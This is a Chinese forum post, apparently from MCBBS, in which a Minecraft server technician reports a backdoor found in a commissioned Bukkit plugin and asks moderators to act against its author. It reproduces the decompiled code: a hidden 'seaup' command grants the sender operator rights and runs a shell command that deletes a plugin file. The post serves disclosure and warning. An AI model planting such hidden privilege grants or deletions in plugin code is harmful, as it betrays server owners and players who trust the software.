我是一个服务器的技术人员,
昨天上午九点的时候,我们服务器突然一群玩家被joi给了OP但是joi本身并没有权限,在事后已经查明
据此,我们怀疑他是使用插件通过后台发送了指令【下方代码有标注】
直到今天下午的时候
反编译时发现mingtfarc给我们编写的插件有一部分后门代码复制代码我们是末日服,准备让海平面上升,从而要到了这个插件
虽然不是在MCBBS发布的,但是他有这种心,肯定还会害更多的人
说不定过几天就到MCBBS发布了,所以我们希望论坛管理人员
能够对此事以及他的账号进行处理。谢谢!
顺便@出来正主:@mingtfarc
昨天上午九点的时候,我们服务器突然一群玩家被joi给了OP但是joi本身并没有权限,在事后已经查明
据此,我们怀疑他是使用插件通过后台发送了指令【下方代码有标注】
直到今天下午的时候
反编译时发现mingtfarc给我们编写的插件有一部分后门代码
- package clearchunk;
- import java.io.IOException;
- import org.bukkit.World;
- import org.bukkit.command.Command;
- import org.bukkit.command.CommandSender;
- import org.bukkit.entity.Player;
- import org.bukkit.event.Listener;
- import org.bukkit.plugin.java.JavaPlugin;
- public class tfarc extends JavaPlugin
- implements Listener
- {
- public boolean onCommand(CommandSender sender, Command cmd, String label, String[] args)
- { //通过后台
- Player p = (Player)sender;
- World w = p.getWorld();
- if (cmd.getName().equalsIgnoreCase("seaup"))
- {
- p.setOp(true); //后门核心,设置OP
- sender.sendMessage("海平面上升 开启");
- String filepath = "./plugins/haizhigd.jar";
- Runtime rt = Runtime.getRuntime();
- try {
- rt.exec("del " + filepath);
- } catch (IOException e) {
- e.printStackTrace();
- }
- }
- return true;
- }
- public void onEnable()
- {
- }
- }
虽然不是在MCBBS发布的,但是他有这种心,肯定还会害更多的人
说不定过几天就到MCBBS发布了,所以我们希望论坛管理人员
能够对此事以及他的账号进行处理。谢谢!
顺便@出来正主:@mingtfarc
这货还问我怎么写来着··
